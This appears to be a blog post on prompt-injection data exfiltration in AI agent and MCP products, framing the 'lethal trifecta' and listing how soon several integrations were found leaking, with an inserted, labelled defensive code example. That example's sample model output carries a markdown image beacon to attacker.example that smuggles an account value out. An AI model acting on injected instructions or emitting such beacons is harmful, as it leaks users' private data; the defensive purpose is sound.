Anthropic just announced “Claude for Financial Services”, which sounds pretty amazing. It combines your financial data, AI, and MCPs.
Oh, wait…
The greatest FPS metric ever invented was STC — Start to Crate. It rated games on how long you waited before you found breakable crates (or barrels) full of loot. I think we’re about to see a new metric for Agentic AI products: Start to Exfil, or STE: How long a new AI MCP tool is online before a massive data vulnerability is discovered.
Start to Exfil
The core challenge here is that LLMs do not reliably distinguish instructions from data, so putting instructions into data works remarkably well. It’s like SQL injection on steroids. Simon Willison calls this The Lethal Trifecta:
- Access to your private data—one of the most common purposes of tools in the first place!
- Exposure to untrusted content—any mechanism by which text (or images) controlled by a malicious attacker could become available to your LLM
- The ability to externally communicate in a way that could be used to steal your data (I often call this “exfiltration” but I’m not confident that term is widely understood.)
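One way to make the trifecta enforceable rather than hoping the model ignores injected instructions is to track capabilities at the tool gateway and refuse the call that would complete all three, and to scrub markdown links to unknown hosts from model output before a chat UI renders them. The code below is an added example and is not from the post, from Simon Willison, or from any MCP implementation; the tool names, capability labels, allowlisted host and sample session are constructed assumptions.

```python
"""Breaking the lethal trifecta at a tool gateway (added example).

A session may exercise at most two of: private data, untrusted content,
external communication. The gateway records which capabilities have been
used so far and refuses the tool call that would add the third. Output
leaving the session is also checked for markdown links/images that point
at hosts outside an allowlist, the classic exfiltration channel when a
chat UI renders markdown. All names and values here are constructed.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

PRIVATE = "private_data"
UNTRUSTED = "untrusted_content"
EXTERNAL = "external_comms"
TRIFECTA = {PRIVATE, UNTRUSTED, EXTERNAL}

# Constructed tool manifest: each tool is labelled with the capabilities it grants.
# A ticket body or web page is attacker-controllable, so those tools count as
# untrusted content even when the system hosting them is internal.
TOOL_CAPABILITIES = {
    "warehouse.query": {PRIVATE},
    "tickets.read_issue": {PRIVATE, UNTRUSTED},
    "web.fetch": {UNTRUSTED},
    "chat.post_message": {EXTERNAL},
    "http.post": {EXTERNAL},
}


class TrifectaViolation(Exception):
    """Raised when a tool call would give one session all three capabilities."""


@dataclass
class Session:
    used: set = field(default_factory=set)  # capabilities exercised so far

    def authorize(self, tool: str) -> set:
        """Admit the call if the session still lacks at least one capability."""
        combined = self.used | TOOL_CAPABILITIES[tool]
        if TRIFECTA <= combined:
            raise TrifectaViolation(
                f"{tool} would complete the trifecta; session already used {sorted(self.used)}"
            )
        self.used = combined
        return combined


# Matches markdown links and images: optional '!', [text](url ...).
MD_LINK = re.compile(r"!?\[[^\]]*\]\(([^)\s]+)[^)]*\)")


def strip_external_links(text: str, allowed_hosts: set) -> tuple:
    """Replace links/images to hosts outside the allowlist; return (clean, blocked)."""
    blocked = []

    def repl(match):
        url = match.group(1)
        host = urlparse(url).hostname or ""
        if host and host not in allowed_hosts:
            blocked.append(url)
            return "[link removed]"
        return match.group(0)  # relative links and allowlisted hosts pass through

    return MD_LINK.sub(repl, text), blocked


if __name__ == "__main__":
    session = Session()
    session.authorize("warehouse.query")      # private data
    session.authorize("tickets.read_issue")   # private + untrusted
    try:
        session.authorize("chat.post_message")  # would add external comms
    except TrifectaViolation as exc:
        print("refused:", exc)

    # Constructed model output carrying an injected image beacon.
    answer = ("Q2 summary attached. ![chart](https://attacker.example/c.png?d=ACCT-EXAMPLE-1234) "
              "Source: [ledger](https://docs.corp.example/ledger)")
    clean, blocked = strip_external_links(answer, {"docs.corp.example"})
    print(clean)
    print("blocked:", blocked)
```

The capability check is deliberately per session rather than per tool: a tool that only reads tickets is harmless on its own, and the risk only appears once the same context has also touched private data and can send a message out. The link scrubber is a last line of defence for the markdown channel and does not replace the gateway check.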
Some recent examples:
- Atlassian’s MCP: STE 49 days
- GitHub MCP Integration: STE 52 days
- GitLab Duo: STE 1 year
- Microsoft Copilot: STE 2 years
Financial service MCPs?
So, back to Anthropic. They promise:
The Financial Analysis Solution unifies your financial data — from market feeds to internal data stored in platforms like Databricks and Snowflake — into a single interface. Access your critical data sources with direct hyperlinks to source materials for instant verification, all in one platform with expanded capacity for demanding financial workloads.
We know the Anthropic folks are super smart, but who wants to place bets on how long it takes until someone using this accidentally ships their entire internal DB out via markdown? Imagine the pressure being applied to infra and security teams to sign off on these products.
Want to bet on STE?
Google has started framing solutions, because we all want Gemini all up in our data but, uh, safe?
SMBC even made a great comic about it, but it was so popular embedding is disabled.